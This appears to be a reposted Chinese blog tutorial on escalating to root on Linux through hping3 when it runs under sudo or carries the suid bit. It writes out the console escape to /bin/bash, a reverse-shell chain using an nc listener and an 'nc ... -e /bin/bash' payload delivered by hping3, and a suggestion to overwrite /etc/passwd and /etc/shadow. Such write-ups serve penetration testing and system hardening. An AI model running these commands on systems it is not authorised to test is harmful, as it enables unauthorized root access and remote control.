當hping3工具有個神奇的地方，hping3支持交互式運行，終端中輸入hping3后可以進入一個hping3的控制臺，這個控制臺不但可以執行hping3自己的命令，也可以把非自身命令定向到shell終端去，當作系統命令執行，因此當hping3具有suid位或者用戶有權限通過sudo執行hping3的時候，hping3可以用來被提權。

1、sudo情況

1）如圖，當前用戶可以sudo免密執行hping3

2）執行如下代碼即可提權成為root賬戶，如圖

~:sudo hping3
hping3>/bin/bash

########################## 反彈SHELL ##########################

//順便記錄下hping3通過傳輸文件進行反彈shell的做法（網上很多文章提到這個環節的步驟，幾乎都不能復現，原因在于使用了--safe參數。這個參數是保證文件傳輸過程中，如果數據包丟失可以重傳。本來應該是一個人畜無害的參數，但是確實無法運行，原因沒有細究）

1）攻擊機監聽用nc監聽一個端口

nc -lvnp 9999

2) 被攻擊機器通過hping3監聽流量，并重定向到/bin/bash中

hping3 192.168.146.128 --listen signature --udp -p 5656 -I enp0s3 |/bin/bash

3）攻擊機編寫反彈shell的bash命令

echo "nc 192.168.146.128 8888 -e /bin/bash" > shell

4）通過hping3將shell命令傳送到被攻擊機

hping3 192.168.146.136 --udp -p 5656 -d 100 --sign signature --file ./shell

5）現在看之前監聽的9999端口應該已經接收到shell了

*PS這個過程個人感覺有點雞肋，不能用來提權。因為linux下，sudo命令不會被繼承到管道符和重定向符之后。也就是說，即使用sudo hping3 ...|/bin/bash。執行后得到的shell也不是root權限。既然如此，反彈shell有一萬種方式，為什么要用這么一個不穩定的方式。

2、有suid位情況

1）如圖，hping3具備suid位

2）直接進入hping3控制臺，便具備了root資源的訪問權限

此時可以通過改寫/etc/passwd和/etc/shadow文件，修改root密碼，進而獲取root權限

總結

以上是生活随笔為你收集整理的sudo -hping3提权（含 suid位）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。